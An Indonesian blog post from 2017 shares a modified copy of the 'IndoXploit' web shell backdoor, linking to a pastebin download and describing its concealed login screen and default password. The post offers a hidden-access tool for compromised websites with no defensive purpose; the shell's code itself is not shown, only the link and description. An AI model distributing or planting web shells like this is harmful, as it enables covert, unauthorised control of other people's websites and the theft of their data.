Selasa, 06 Juni 2017

Shell IndoXploit - Modified By Orangutan1Billion

Kali ini saya akan berbagi shell backdoor milik kelompok IndoXploit, tapi untuk tampilan shellnya agak saya ubah-ubah sedikit hehe.

Shell Indoxploit

Langsung sedot sini :
https://pastebin.com/raw/6dG02iQu
Tampilan login shell :

Shell Indoxploit
(Tampilan loginnya tersembunyi, untuk input passwordnya tinggal tekan tombol tab di keyboard, default password ada di scriptnya)


Untuk tampilan utamanya seperti ini :

Shell Indoxploit


Ingat! Sekali lagi ini bukan shell backdoor bikinan saya, saya cuma mengubah dibagian tampilannya saja agar lebih sesuai dengan keinginan saya, siapa tau ada yang suka dengan tampilannya, tapi gak penting juga deng tampilannya, yang penting itu fiturnya hoho. Semoga Team IndoXploit berkenan ya shellnya saya modifikasi begini hehe.


EmoticonEmoticon